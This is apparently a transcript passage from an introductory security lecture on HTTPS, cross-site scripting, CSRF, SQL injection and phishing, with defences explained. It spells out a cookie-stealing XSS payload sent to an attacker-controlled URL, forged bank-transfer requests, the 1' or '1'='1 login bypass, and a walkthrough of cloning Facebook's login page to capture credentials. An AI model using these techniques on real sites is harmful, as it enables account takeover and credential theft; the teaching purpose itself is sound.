  • Instead, as I mentioned, the server is going to respond with a key.

  • And that key is the key to a cipher.

  • And we've talked about ciphers before and we know that they are reversible.

  • The particular cipher in question here is something called AES.

  • But it is just a cipher.

  • It is reversible.

  • And the key that you receive is the key that you

  • are supposed to use to decrypt all future communications.

  • This key is called the session key.

  • And you use it to decrypt all future communications

  • and use it to encrypt all future communications to the server

  • until the session, so-called, is terminated.

  • And the session is basically as long as you're on the site

  • and you haven't logged out or closed the window.

  • That is the idea of a session.

  • It is one singular experience with a page

  • or with a set of pages that are all part of same domain name.

  • We're just going to use a cipher for the rest of the time that we talk.

  • Now, this may seem insecure for reasons we've

  • talked about when we talked about ciphers

  • and how they are inherently flawed.

  • Recall that when we were talking about some of the really early ciphers,

  • those are classic ciphers like Caesar and Vigenere,

  • those are very easy to break.

  • AES is much more complex than that.

  • And the other upside is that this key, like I mentioned,

  • is only good for a session.

  • So in the unlikely event that the server chooses a bad key, for example, if we

  • think about it as if it was Caesar, if they choose a key of zero,

  • which would be a very bad key, or key of one that doesn't actually

  • shift the letters at all, even if the key is compromised,

  • it's only good for a particular session.

  • That's not a very long amount of time.

  • But the upside is the ability to encipher

  • and decipher information is much faster.

  • If it's reversible, it's pretty quick to do some mathematical manipulation

  • and transform it into something that looks obscured and gibberish

  • and to undo that as well.

  • And so even though public and private keys are--

  • we consider effectively unbreakable, like to the point

  • of it's mathematically untenable to crack a message using

  • public and private key encryption.

  • We don't rely on it for SSL because it is impractical to actually expect

  • communications to go that slowly.

  • And so we do fall back on these ciphers.

  • And that really is when you're using secured encrypted communication

  • via HTTPS.

  • You're just relying on a cipher that just

  • happens to be a very, very fancy cipher that should hypothetically

  • be very difficult to figure out the key to as well.

  • You may have also seen a few changes in your browser, especially recently.

  • This screenshot shows a couple of changes

  • that are designed to warn you when you are not using HTTPS encryption.

  • And it's not necessary to use HTTPS for every interaction you

  • have on the internet.

  • For example, if you are going to a site that is purely informational,

  • it's just static content, it's just a list of information, there's no login,

  • there's no buying, there's no clicking on things that might then get tracked,

  • for example, it's not really necessary to use HTTPS.

  • So don't be necessarily alarmed if you visit a site

  • and your warned it's not secure.

  • We're told that over time this will turn red and become perhaps even

  • more concerning as more versions of this come out

  • and as more and more adopters of HTTPS exist as well.

  • But you're going to start getting notifications.

  • And you may have seen these as well in green.

  • If you are using HTTPS and you log into something,

  • you'll see a little lock icon here and you'll be told that it is secure.

  • And again, this is just because human beings

  • tend not to be as concerned about their digital privacy

  • and their digital security when using the internet.

  • And now the technology is trying to provide clues and tips

  • to entice you to be more concerned about these things.

  • Now let's take a look at a couple of attacks

  • that are derived from things we typically consider

  • to be advantages of using the internet.

  • The first of these is the idea of cross-site scripting, XSS.

  • We've previously discussed this idea of the distinction

  • between server-side code and client-side code.

  • Client-side code, recall, is something that runs locally

  • on our computer where our browser, for example,

  • is expected to interpret and execute that code.

  • Server-side code is run on the server.

  • And when we get information from a server,

  • we're not getting back the actual lines of code.

  • We're getting back the output of that code having run in the first place.

  • So for example, there might be some code on the server, some Python code or PHP

  • code that generates HTML for us.

  • The actual Python or PHP code in this example would be server-side code.

  • We don't actually ever see that code.

  • We only see the output of that code.

  • A cross-site script vulnerability exists when

  • an adversary is able to trick a client's browser to run something locally.

  • And it will do something that presumably the person, the client,

  • didn't actually intend to do.

  • Let's take a look at an example of this using a very simple web

  • server called Flask.

  • We have here some Python code.

  • And don't be too worried if this doesn't all make sense to you.

  • It's just a pretty short, simple web server that does two things.

  • So this is just some bookkeeping stuff in Flask.

  • And Flask is a package of Python that is used to create web servers.

  • This web server has two things, though, that it does.

  • The first is when I visit slash on my web server--

  • so let's say this is Doug's site.

  • If I go to dougssite.com, which you may not actually explicitly type anymore

  • but most browsers just add it, slash just

  • means the root page of your server.

  • I'm going to call the following function whose name happens

  • to be called index in this case.

  • Return hello world.

  • And what this basically means is if I visit dougspage.com/,

  • what I receive is an HTML page whose content is just hello world.

  • So it's just an HTML file that says hello world.

  • Again, this code here is all server-side code.

  • You don't actually see this code.

  • You only see the output of this code, which is this here, this HTML.

  • It's just a simple string in this case, but it would

  • be interpreted by the browser as HTML.

  • If, however, I get a 404--

  • a 404 is a not found error. it means the page I requested doesn't exist.

  • And since I've only defined the behavior for literally one page,

  • slash the index page of my server, then I want to call this function not found.

  • Return not found plus whatever page I tried to visit.

  • So it basically is another very simple page, much like hello world here,

  • where instead of saying hello world, it says not found.

  • And then it also concatenates onto the very end of that whatever page

  • I tried to visit.

  • This is a major cross-site scripting vulnerability.

  • And let's see why.

  • Let's imagine I go to /foo, so dougspage/com/foo.

  • Recall that our error handler function, which I've reproduced down here,

  • will return not found /foo.

  • Seems pretty reasonable.

  • It seems like the behavior I expected or intended to have happen.

  • But what about if I go to a page like this one?

  • So this is what I literally type in the browser, dougspage.com/ angle bracket,

  • script, angle bracket alert(hi) and then a closed script tag there.

  • This script here, script here, looks a lot like HTML.

  • And in fact, when the browser sees this, it will interpret it as HTML.

  • And so I will get returned by visiting this page not found And then everything

  • here except for the leading slash, which means

  • that when I receive this and my client is interpreting the HTML,

  • I'm going to generate an alert.

  • What is an alert?

  • Well, if you've ever gone to a website and had a pop-up box display

  • some information, you have to click OK or click X to make

  • it go away, that's what an alert is.

  • So I visit this page on my website, I've actually

  • tricked my browser into giving me a JavaScript alert,

  • or I've tricked whoever visits this page's browser

  • to give me a JavaScript alert.

  • So that's probably not exactly a good thing.

  • But it can get a little bit more nefarious than that.

  • Let's instead imagine-- instead of having this be on my server,

  • it might be easier to imagine it like this, that this is what I wrote.

  • This script tag here's what I wrote into my Facebook profile, for example.

  • So Facebook gives you the ability to write a short little bio

  • about yourself.

  • Let's imagine that my bio was this script document.write, image source,

  • and then I have a hacker URL and everything.

  • And imagine that I own hacker URL.

  • So I own hacker URL and I wrote this in my Facebook profile.

  • Assuming that Facebook did not defend against cross-site scripting

  • attacks, which they do, but assuming that they did not,

  • anytime somebody visited my profile, their browser

  • would be forced to contend with this script tag here.

  • Why?

  • Because they're trying to visit my profile page.

  • My profile page contains literally these characters which

  • are going to be interpreted as HTML.

  • And it's going to add document.write-- that's a JavaScript way of saying add

  • the following line in addition to the HTML of the page--

  • image source equals hacker url?cookie= and then document.cookie.

  • So imagine that I, again, control hacker URL.

  • Presumably, as somebody who is running a website,

  • I also maintain logs of every time somebody tries to access my website,

  • what page on my site they're trying to visit.

  • If somebody goes to my Facebook profile and executes this,

  • I'm going to get notified via my hacker URL logs that somebody has tried to go

  • to that page ?cookie= and then document.cookie.

  • Now, document.cookie in this case, because this

  • exists on my Facebook profile, is an individual's cookie for Facebook.

  • So here what I am doing-- again, Facebook

  • does defend against cross-site scripting attacks,

  • so this can't actually happen on Facebook.

  • But assuming that they did not defend against them adequately,

  • what I'm basically doing is getting told via my log

  • that somebody tried to visit some page on my URL,

  • but the page that they tried to visit, I'm

  • plugging in and basically stealing the cookie that they use for Facebook.

  • And a cookie, recall, is sort of like a hand stamp.

  • It's basically me, instead of having to re-log

  • into Facebook every time I want to use it, going up to Facebook

  • and saying, here.

  • You've already verified my identity.

  • Just take a look at this, and you get let in.

  • And now I hypothetically know someone else's Facebook cookie.

  • And if I was clever, I could try and use that

  • to change what my Facebook cookie is to that person's Facebook cookie.

  • And then suddenly I'm able to log in and view their profile and act as them.

  • This image tag here is just a clever trick

  • because the idea is that it's trying to pull some resource from my site.

  • It doesn't exist.

  • I don't have a list of all the cookies on Facebook.

  • But I'm being told that somebody is trying to access this URL on my site.

  • So the image tag is just sort of a trick to force

  • it to log something on my hacker URL.

  • But the idea here is that I would be able to steal somebody's Facebook

  • cookie where this attack's not well-defended against.

  • So what techniques can we use either for our own sites

  • when we are running to avoid cross-site scripting vulnerabilities

  • or to protect against cross-site scripting vulnerabilities?

  • The first technique that we can use is to sanitize, so to speak,

  • all of the inputs that come in to our page.

  • So let's take a look at how exactly we might do this.

  • So it turns out that there are things called

  • HTML entities, which are other ways of representing certain characters in HTML

  • that might be considered special or control characters, so things like,

  • for example, this or this.

  • Typically, when a browser sees a character left

  • angle bracket or right angle bracket, it's

  • going to automatically interpret that as some HTML that it should then process.

  • So in the example I just showed a moment ago,

  • I was using the fact that whenever it sees angle brackets with script

  • around it, they're going to try and interpret whatever

  • is between those tags as a script.

  • One way for me to prevent that from being interpreted as a script

  • is to call this or call this something else other than just left angle bracket

  • and right angle bracket.

  • And it turns out that there are these things called HTML entities that

  • can be used to refer to these characters instead,

  • such that if I sanitize my input in such a way

  • that every time somebody literally typed the character left angle bracket,

  • I had written some code that automatically took that and changed it

  • into ampersand lt;.

  • And then every time somebody wrote a greater than character,

  • or right angle bracket, I changed that in the code to ampersand gt;.

  • Then when my page was responsible for processing or interpreting something,

  • it wouldn't interpret this-- it would still display this character as a left

  • angle bracket or less than-- that's what the lt stands for here--

  • or a right angle bracket, greater than.

  • That's what the gt stands for there.

  • It would literally just show those characters and not treat them as HTML.

  • So that's the idea of what it means to sanitize input when we're talking

  • about HTML entities, for example.

  • Another thing that we could do is just disable JavaScript entirely.

  • This would have some upsides and some downsides.

  • The upside is you're pretty protected against cross-site scripting

  • vulnerabilities because they're usually going to be introduced via JavaScript.

  • The downside is JavaScript is pretty convenient.

  • It's nice.

  • It makes for a better user experience.

  • Sometimes there might be parts of our page

  • that just don't work if JavaScript is completely disabled,

  • and so trade-offs there.

  • You're protecting yourself, but you might be doing

  • other sorts of non-material damage.

  • Or we could decide to just handle the JavaScript in a special way.

  • So for example, we might not allow what's

  • called inline JavaScript, for example, like the script tags

  • that I just showed a moment ago.

  • But we might allow JavaScripts written in separate JavaScript files

  • which can also be linked into your HTML pages.

  • So those would be allowed, but inline JavaScript, like what we just saw,

  • would not be allowed.

  • We could sandbox the JavaScript and run it separately somewhere else first

  • to see if it does something weird, and if it doesn't do something weird,

  • then allow it to be displayed.

  • We could also execute the content security policy.

  • Content security policy is another header

  • that we can add to our HTML pages or HTTP responses.

  • And we can define certain behavior to happen

  • such that will allow certain lines or certain types of JavaScript through

  • but not others.

  • Now, there's another type of attack that can

  • be used that relies heavily on the fact that we use cookies so extensively,

  • and that is a cross-site request forgery, or a CSRF.

  • Now, cross-eyed scripting attacks generally

  • involve receiving some content and the client's browser

  • being tricked into doing something locally that it didn't want to do.

  • In a CSRF request, or CSRF attack, rather,

  • the trick is we're relying on the fact that there

  • is a cookie that can be exploited to make

  • a an outbound request, an outbound HTTP request that we did not intend to make.

  • And again, this relies extensively on cookies

  • because they are this shorthand, short-form way to log into something.

  • And we can make a fraudulent request appear legitimate

  • if we can rely on someone's cookie.

  • Now, again, if you ever use a cloud service for example,

  • they're going to have CSRF defenses built into them.

  • This is really if you're building a simple site

  • and you don't defend against this.

  • Flask, for example, does not defend against this particularly well,

  • but Flask is a very simple web framework for servers.

  • They're generally going to be much more complicated than that

  • and have much more additional functionality to be more featurefull.

  • So let's walk through what these cross-site request

  • forgeries might look like.

  • And for context, let's imagine that I send you an email

  • asking you to click on some URL.

  • So you're going to click on this link.

  • It's going to redirect you to some page.

  • Maybe that page looks something like this.

  • It's pretty simple, not much going on here.

  • I have a body.

  • And inside of it I have one more link.

  • And the link is http://hackbank.com/ transfertodoug=amt500.

  • Now, perhaps you don't hover over it and see the link at the beginning of it.

  • But maybe you are a customer of Hack Bank.

  • And maybe I know that you're a customer of Hack Bank such that if you click

  • on this link and if you happen to be logged in, and if you happen to have

  • your cookie set for hackbank.com, and this was the way that they actually

  • executed transfers, by having you go to /transfer and say to whom you want

  • to send money and in what amount--

  • And fortunately, most banks don't actually do this.

  • Usually, if you're going to do something that manipulates the database, as this

  • would, because it's going to be transferring some amount of money

  • somewhere that would be via HTTP POST request--

  • this is just a straightforward GET request I'm making here.

  • If you were logged in, though, to Hack Bank,

  • or if you're cookie for Hack Bank was set

  • and you clicked on this link, hypothetically, a transfer of $500--

  • again, assuming that this was how you did it,

  • you specified a person and you specified an amount--

  • would be transferred from your account to presumably my account.

  • That's probably not something you intended to do.

  • So that would be an example of why this is a cross-site request forgery.

  • It's a legitimate request.

  • It appears that you intended to do this because it came from you.

  • It's using your cookie.

  • But you didn't actually intend for it to happen.

  • Here's another example.

  • You click on the link in my email and you get brought to this page.

  • So there's not actually even a second link to click anymore.

  • Now it's just trying to load an image.

  • Now, looking at this URL, we can tell there's not an image there.

  • It doesn't end in jpeg or .pmg or the like.

  • It's the same URL as before.

  • But my browser sees image source equals something and says,

  • well, I'm at least going to try and go to that URL

  • and see if there is an image there to load for you.

  • Again, you just click on the link in the email.

  • This page loads.

  • My browser tries to go to this page, or your browser in this case

  • tries to go to this page to load the image there.

  • But in so doing, it's, again, executing this unintended transfer,

  • relying on your cookie at hackbank.com.

  • Another example of this might be a form.

  • So again, it appears that you click on the link in the email.

  • You get brought to a form that just has now just a button at the bottom of it

  • that says Click Here.

  • And the reason it just has a button, even

  • though there's other stuff written, is that those first two fields are hidden.

  • They are type equals hidden, which means you wouldn't actually

  • see them when you load your browser.

  • Now, contrast this, for example, with a field

  • whose type is text, which you might see if you're doing a straightforward

  • login.

  • You would type characters in and see the actual characters appear.

  • That's text versus a password field where you would

  • type characters in and see all stars.

  • It would visually obscure what you typed.

  • The action of this form, or so to say where

  • the form-- what happens when you click on the Submit button at the bottom

  • is the same as before.

  • It's hackbank.com/transfer.

  • And then I'm using these parameters here;

  • to Doug, the amount of $500, Click Here.

  • Now I actually am using a notice also POST request

  • to try to initiate this transfer, again, assuming

  • that this was how Hack Bank structured transfer requests in this way.

  • So if you clicked here and this was otherwise validly structured

  • and you were logged in, or your cookie was valid for Hack Bank,

  • then this would initiate a transfer of $500.

  • And I can play another similar trick to what I did a moment ago with the image

  • by doing something like this where, when the page is loaded,

  • instantly submit this form.

  • So you don't even have to click here anymore.

  • It's just going to go through the document,

  • document being JavaScript's way of referring to the entire web page,

  • find the first form, form zeros, assuming

  • this is the first form on the page, and just submit it.

  • Doesn't matter what else is going on.

  • Just submit this form.

  • That would also initiate transfer if you clicked on that link from my email.

  • So a quick summary of these two different types of attacks.

  • Cross-site scripting attacks, the adversary

  • tricks you into executing code on your browser to do something locally

  • that you probably did not intend.

  • And a cross-site request forgery, something

  • that appears to be a legitimate request from your browser

  • because it's relying on cookies, your ostensibly logged in in that way,

  • but you don't actually mean to make that request.

  • Now let's talk about a couple of vulnerabilities

  • that exist in the context of a database, which I

  • know you've discussed recently as well.

  • So imagine that I have a table of users on my database

  • that looks like this, that each of them has an ID number, they have a username,

  • and they have a password.

  • Now, the obvious vulnerability here is I really

  • shouldn't be storing my users' passwords like this in the clear.

  • If somebody were to ever hack and get a hold of this database file,

  • that's really, really bad.

  • I am not taking best practices to protect my customers' information.

  • So I want to avoid doing that.

  • So instead what I might do, as we've discussed, is hash their passwords,

  • run them through some hash function so that when they're actually stored,

  • they get stored looking something like this.

  • You have no idea what the original password was.

  • And because it's a hash, it's irreversible.

  • You should not be able to undo what I did

  • when I ran through the hash function.

  • But there's actually still a vulnerability here.

  • And the vulnerability here is not technical.

  • It's human again.

  • And the vulnerability that exists here is that we see--

  • we're using a hash function, so it's deterministic.

  • When we pass some data through it, we're going to get the same output every time

  • we pass data through it.

  • And two of our users, Charlie and Eric, have the same hash.

  • We saw this makes sense, because if we go back a moment,

  • they also had the same actual password when it was stored in plain text.

  • We've gone out of our way to try and defend against that by hashing it.

  • But somebody who gets a hold of this database file, for example,

  • they hack into it, they get it, they'll see two people have the same password.

  • And maybe this is a very small subset of my user base.

  • And maybe there's hundreds of thousands of people.

  • And maybe 10% of them all have the same hash.

  • Well, again, human beings, we are not the best at defending our own stuff.

  • It's a sad truth that the most common password

  • is password followed by some of these other examples we had a second ago.

  • All of these are pretty bad passwords.

  • They're all on the list of some of the most commonly used passwords

  • for all services, which means that if you see a hash like this,

  • it doesn't matter that we have taken steps

  • to protect our users against this.

  • If we see a hash like this many, many times in our database, a clever hacker,

  • a clever adversary might think, oh, well,

  • I'm seeing this password 10% of the time,

  • so I'm going to guess that Charlie's password for the service is 12345

  • and they're wrong.

  • And then they'll maybe try abcdef and they're wrong, and then maybe try

  • password and they're right.

  • And then all of a sudden every time they see that hash, they

  • can assume that the password is password for every single one of those users.

  • So again, nothing we can do as technologists to solve this problem.

  • This is really just getting folks to understand

  • that using different passwords, using non-standard passwords,

  • is really important.

  • That's why we talked about password managers and maybe not even knowing

  • your own passwords in a prior lecture.

  • There's another problem that can exist, though, with databases, in particular,

  • when we see screens like this.

  • So this is a contrived login screen that has a username and password

  • field And a Forgot Password button whose purpose in life

  • is, if you type in your email address and you--

  • which is the username in this case, and you

  • have the Forgot Password box checked, and you try and click login,

  • instead of actually logging you in, it's going to email you, hopefully,

  • a link to your password, not your actual password for reasons

  • we previously discussed as well.

  • But what if when we click on this button we see this?

  • OK.

  • We've emailed you a link to change your password.

  • Does that seem inherently problematic?

  • Perhaps not.

  • But what about if you see this as well?

  • Somebody might see this if they're logged in as well.

  • Sorry, no user with that email address.

  • Does that perhaps seem problematic when you compare it against this?

  • This is an example of something called information leakage.

  • Perhaps an adversary has hacked some other database

  • where folks were not being as secure with credentials.

  • And so they have a whole set of email addresses mapped to credentials.

  • And because human beings tend to reuse the same credentials

  • on multiple different services, they are trying different services

  • that they believe that these users might also

  • use using those same username and password combinations.

  • If this is the way that we field these types of forgot password inquiries,

  • we're revealing some information potentially.

  • If Alice is a user, we're now saying, yes, Alice is a user of this.

  • Try this password.

  • If we get something like this, then the adversary might not bother trying.

  • They've realized, oh, Alice is not a user of this service.

  • And even if they're not trying to hack into it, if we do something like this,

  • we're also telling that adversary quite a bit about Alice.

  • Now we know Alice uses this service, and this service, and this service,

  • and not this service.

  • And they can sort of create a picture of who Alice might be.

  • They're sort of using her digital footprint to understand more about her.

  • A better response in this case might be to say something like this,

  • request received.

  • If you're in our system, you'll receive an email with instructions shortly.

  • That's not tipping our hand either way as

  • to whether the user is in the database or not in the database.

  • No information leakage here, and generally a better way

  • to protect our customer's privacy.

  • Now, that's not the only problem that we can have with databases.

  • We've alluded to this idea of SQL injection.

  • And there's this comment that gets the rounds quite a bit

  • when we talk about SQL injection from a web comic called

  • XKCD that involves a SQL injection attack, which is basically

  • providing some information that--

  • or providing some text or some query that we want to make to a database

  • where that query actually does something unintended.

  • It actually itself is SQL as opposed to just plugging in some parameter,

  • like what is your name, and then searching the database for that name.

  • Instead of giving you my name, I might give you

  • something that is actually a SQL query that's

  • going to be executed that you don't want me to execute.

  • So let's see an example of how this might work.

  • So here's another simple username and password field.

  • And in this example, I've written my password field poorly intentionally

  • for purposes of the example so that it will actually

  • show you the text that is typed as opposed to showing

  • you stars like a password field should.

  • So this is something that the user sees when they access my site.

  • And perhaps on the back end in the server-side code, inside of Python

  • somewhere I have written a SQL query that looks like the following.

  • When the login button is clicked, execute the following SQL query.

  • SELECT star from users where username equals uname--

  • and uname here in yellow referring to whatever was typed in this box--

  • and password equals pword, where, again, pword

  • is referring to whatever was typed in this box.

  • So we're doing a SQL query to select star from users,

  • get all of the information from the users table

  • where the username equals whatever they typed in that box

  • and the password equals whatever they typed in that box.

  • And so, for example, if I have somebody who

  • logs in with the username Alice and the password

  • 12345, what the query would actually look like with these values plugged

  • into it might look something like this; SELECT star from users where username

  • equals Alice and password equals 12345.

  • If there is nobody with username Alice or Alice's password is not 12345,

  • then this will fail.

  • Both of those conditions need to be true.

  • But what about this?

  • Someone whose username is hacker and their password is 1' or '1' equals '1.

  • That looks pretty weird.

  • And the reason that that looks pretty weird

  • is because this is an attempt to inject SQL,

  • to trick SQL into doing something that is presumably not intended by the code

  • that we wrote.

  • Now, it probably helps to take a look at it plugging the data in

  • to see what exactly this is going to do.

  • SELECT star from users where username equals hacker or--

  • excuse me, and password equals '1' or and so on and so on.

  • Maybe I do have a person whose username actually is hacker,

  • but that's probably not their password.

  • That doesn't matter.

  • I'm still going to be able to log in if I

  • have somebody whose username is hacker.

  • And the reason for that is because of this or.

  • I have sort of short circuited the end of the SQL query.

  • I have this quote mark that demarcates the end of what the user presumably

  • typed in.

  • But I've actually literally typed those into my password

  • to trick SQL such that if hacker's password equals 1,

  • it just happens to literally be the character 1, OK, I have succeeded.

  • I guess that's a really bad password, and I

  • shouldn't be able to log it in that way, but maybe that is the case

  • and I'm able to log in.

  • But even if not, this other thing is true.

  • '1' does equal '1'.

  • So as long as somebody whose username is hacker exists in the database,

  • I am now able to log in as hacker because this is true.

  • This part's probably not true, right?

  • It's unlikely that their password is 1.

  • Regardless of what their password is, this part actually is true.

  • It's a very simple SQL injection attack.

  • I'm basically logging in as someone who I'm presumably not supposed

  • to be able to log in as, but it illustrates the kind of thing

  • that could happen.

  • You are allowing people to bypass logins.

  • Now, it could get worse if your database administrator username

  • is admin or something very common.

  • The default for this is typically admin.

  • This would potentially give people the ability

  • to be database administrators, that they're

  • able to execute exactly this kind of trick on the admin user.

  • Now they have administrative access to your database, which

  • means they can do things like manipulate the data in the database,

  • change things, add things, delete things that you don't want to have deleted.

  • And in the case of a database, deletion is pretty permanent.

  • You can't undo a delete most of the time in a database

  • as the way you might be able to do with other files.

  • Now, are there techniques to avoid this kind of attack?

  • Fortunately, there are.

  • Right now I'd like just to just take a look at a very simple Python

  • program that replicates the kind of thing

  • that one could do in a more robust, more complex SQL situation.

  • So let's pull up a program here where we're just

  • simulating this idea of a SQL injection just

  • to show you how it's not that difficult to defend against it.

  • So let's pull up the code here in this file login.py.

  • So there's not that much going on here.

  • I have x equals input username.

  • So x, recall, is a Python variable.

  • And input username is basically going to prompt the user with the string

  • username and then expect them to type something after that.

  • And then we do exactly the same thing with password

  • except storing the result there in y.

  • So whatever the user types after username will get stored in x.

  • Whatever they type after password will get stored in y.

  • And then here I'm just going to print.

  • And in the SQL context, this would be the query that actually gets executed.

  • So imagine that that's what's happening instead.

  • SELECT star from users where username equals and then this symbol here,

  • '[? x ?]'.

  • What I'm doing here is just using a Python-formatted string.

  • That's what this f here-- it's not a typo--

  • at the beginning means, is I'm going to plug in whatever the person, the user,

  • typed at the first prompt, which I stored in x here,

  • and whatever the user typed the second prompt that's store in y there.

  • So let's actually just run this program.

  • So let's pop open here for a second.

  • The name of this program is login.py, so I'm going to type python

  • login.py, Enter.

  • Username, Doug.

  • Password, 12345.

  • And then the query, hypothetically, that would get executed if I constructed it

  • in this way is SELECT star from users where username

  • equals Doug and password equals 12345.

  • Seems reasonable.

  • But if I try and do the adversary thing that I did a moment ago,

  • username equals Doug, password equals 1' or '1' equals '1, not

  • a final single quote, and I hit Enter, then I end up with SELECT star

  • from users where username equals Doug and password equals 1 or 1 equals 1.

  • And the latter part of that is true.

  • The former part is false.

  • But it's good enough that I would be able to log in

  • if I did something like that.

  • But we want to try and get around that.

  • So now let's take a look at a second file that might solve this problem.

  • So I'm going to open up login2.py in my editor here.

  • So now it starts out exactly the same, x equals something, y equals something.

  • But I'm making a pretty basic substitution.

  • I'm replacing every time that I see single quotes with double quotes.

  • So I'm replacing every instance of single quote,

  • and I have to preface it with a backslash.

  • Because notice I'm actually using single quotes to identify the character.

  • It just so happens that it's to indicate that I'm trying to substitute something

  • which I'm putting in single quotes.

  • The thing I'm trying to substitute actually is a single quote,

  • and so I need to put a backslash in front of it

  • to escape that character such that it actually

  • gets treated as a single quotation mark character as opposed

  • to some special Python--

  • Python's not going to try and interpret it in some other way.

  • So I want to replace every instance of a single quote in x with a double quote,

  • and I want to replace every instance of a single quote in y

  • with a double quote.

  • Now, why do I want to do that?

  • Because notice in my actual Python string here

  • I'm using single quotes to set off the variables for purposes

  • of SQL's interpretation of them.

  • So where the user name equals this string,

  • I'm using single quotes to do that.

  • So if my username or my password also contained single quotation mark

  • characters, when SQL was interpreting it,

  • it might think that the next single quote character it sees is the end.

  • I'm done with what I've prompted.

  • And that's exactly how I tricked it in the previous example.

  • I used that first single quote, which seemed kind of random and out

  • of nowhere, to trick SQL into thinking I'm done with this.

  • Then I used the keyword or back now into a SQL and not some string

  • that I'm searching for, and then I would continue this trick going forward.

  • So this is designed to eliminate all the single quotes,

  • because the single quotes mean something very special

  • in the context of my SQL query itself.

  • If you're actually using SQL libraries that are tied into Python,

  • the ability to replace things is much more robust than this example.

  • But even this very simple example where I'm

  • doing just this very basic substitution is good enough

  • to get around the injection attack that we just looked at.

  • So this is now in login2.py.

  • Let's do this.

  • Let's Python login2.py.

  • And we'll start out the same way.

  • We'll do Doug and 12345.

  • And it appears that nothing has changed.

  • The behavior is otherwise identical because I'm not

  • trying to do any tricks like that.

  • SELECT star from users where username equals Doug and password equals 12345.

  • But if I now try that same trick that I did a moment ago,

  • so password is 1' or '1' equals '1 and I hit Enter,

  • now I'm not subject to that same SQL injection anymore because I'm trying

  • to select all the information from the users table where the username is Doug

  • and the password equals--

  • And notice that here is the first single quote.

  • Here is the second one.

  • So it's thinking that entire thing now is the password.

  • Only if my password is literally 1" or "1" equals "1,

  • then I would be literally logging in.

  • If that happened to be my password, this would work.

  • But otherwise I've escaped.

  • I've stopped the adversary from being able to leverage

  • a simple trick like this to break in to my database

  • when perhaps they're not intended to do so.

  • And again, in actual SQL injection defense, the substitutions that we make

  • are much more complicated than this.

  • We're not just looking for single quote characters and double quote characters,

  • but we're considering semicolons or any other special characters

  • that SQL would interpret as part of a statement.

  • We can escape those out so that users could literally

  • use single quotes or semicolons or the like in their passwords

  • without necessarily compromising the integrity of the entire database

  • overall.

  • So we've taken a look at several of the most common, most obvious ways

  • that an adversary might be able to extract information

  • either from a business or an individual.

  • And these ways are kind of attention-getting in some context.

  • But let's focus now-- let's go back and bring things

  • full circle to something I've mentioned many times,

  • which is humans are the core fatal flaw in all of these security things

  • that we're dealing with here.

  • And so let's bring things full circle by talking

  • about phishing, what phishing is.

  • So phishing is just an attempt by an adversary to prey upon us

  • and our unfortunate general ignorance of basic security protocols.

  • So it's just an attempt to socially engineer,

  • basically, information out of someone.

  • You pretend to be someone that you are not.

  • And if you do so convincingly enough, you

  • might be able to extract information about that person.

  • Now, phishing you'll also see in other contexts that are--

  • computer scientists like to be clever with their wordplay.

  • You'll see things like netting, which is basically a phishing attack that

  • launches against many people at once, hoping

  • they'll be able to get one or two.

  • There's spear phishing, which is a phishing

  • attack that targets one specific person trying to get information from them.

  • And then there's whaling, which is a phishing attack that

  • is targeted against somebody who is perceived to have a lot of information

  • or whose information is particularly valuable such

  • that you'd be phishing for some big whale.

  • Now, one of the most obvious and easy types of phishing attack

  • looks like this.

  • It's a simple URL substitution.

  • This is how we can write a link in HTML.

  • A is the HTML tag for anchor, which we use for hyperlinks.

  • Href is where we are going to.

  • And then we also have the ability to specify some text at the end of that.

  • These two items do not have to match, as you can see here.

  • I can say we're going to URL2 but actually send you to URL1.

  • This is an incredibly common way to get information from somebody.

  • They think they're going one place but they're actually going someplace else.

  • And to show you, as a very basic example, just how easy it

  • is to potentially trick somebody into going somewhere they're not supposed to

  • and potentially then revealing credentials as well,

  • let's just take a simple example here with Facebook.

  • And why don't we just take a moment to build our own version of Facebook

  • and see if we can't get somebody to potentially reveal information to us?

  • So let's imagine that I have acquired some domain

  • name that's really similar to Facebook.com,

  • like it's off by one character.

  • It's a common typo.

  • For example fs maybe is a common thing.

  • People mistype the A or something like that

  • that would be really not necessarily obvious to somebody at the outset.

  • One way that I might be able to just take advantage of somebody's thinking

  • that they're logging into Facebook is to make a page that

  • looks exactly the same as Facebook.

  • That's actually not very difficult to do.

  • All you have to do is open up Facebook here.

  • And because its HTML is available to me, I can right click on it,

  • view page source, take a second to load here--

  • Facebook is a pretty big site--

  • and then I can just control A, copy, select all, copy all of the content,

  • and paste this in to my index.html, and we will save.

  • And then we'll head back into our terminal here,

  • and I will start Chrome on the file index.html, which

  • is the file that I literally just saved my Facebook information in.

  • So start Chrome index.html.

  • You'll notice that it brings me to this URL

  • here, which is the file for where I currently live,

  • or where this file currently lives.

  • And this page looks like Facebook, except for the fact that,

  • when I log in, I then get redirected back

  • to something that actually is Facebook and is not something that I control.

  • But at the outset, my page here at the very beginning

  • looks identical to Facebook.

  • Now, the trick here would be to do something

  • so that the user would provide information here in the email box

  • and then here in the password field such that when they click Login,

  • I might be able to get that information from them.

  • Maybe I just am waiting to capture their information.

  • So the next step for me might be to go back into my random set of stuff here.

  • There's a lot of random code that we don't really care about.

  • But the one thing I do care about is what happens when

  • somebody clicks on this Login button.

  • That is interesting to me.

  • So I'm going to go through this and just do control F,

  • control F just being find, the string login.

  • That's the text that's literally written on the button,

  • so hopefully I'll find that somewhere.

  • I'm told I have eight results.

  • So this is, if I just kind of look around

  • for context to try and figure out where I

  • am in the code, the title of something, so that's probably not it.

  • So I don't want to go there.

  • Create an account or login, not quite what I'm looking for.

  • So go the next one.

  • OK, here we go, input value equals login.

  • So now I found an input that is called login.

  • So this is presumably a button that's presumably part of some form.

  • So if I scroll up a little bit higher, hopefully I

  • will find a form, which I do, form ID.

  • And it has an action.

  • The action is to go to this particular page,

  • facebook.com/login/ and so on and so on.

  • But maybe I want to send it somewhere else.

  • So if I replace this entire URL with where I actually want to send the user,

  • where maybe I'm going to capture their information,

  • maybe I'll store this in login.html.

  • And so that's what's going to come in here.

  • And then we'll save the file such that our changes have been captured.

  • So presumably what should happen is now, when

  • you click on the Login button in my fake Facebook,

  • you instead get redirected to login.html rather than the Facebook actual login

  • as we saw just a moment ago.

  • So let's try again.

  • We'll go back here to our fake Facebook page.

  • We will refresh so that we get our new content.

  • Remember, we just changed the HTML content,

  • so we actually need to reload it so that our browser has it.

  • And we'll type in abc@cs50.net and then some password here and click Login,

  • and we get redirected here.

  • Sorry, we are unable to log you in at this time.

  • But notice we're still in a file that I created.

  • I didn't show you login.html, but that's exactly what I put there.

  • Now, I'm not actually going to phish for information here.

  • And I'm going to do something that would arguably vio--

  • even though I'm using fake data here, I'm

  • not going to do something that would violate the terms of service

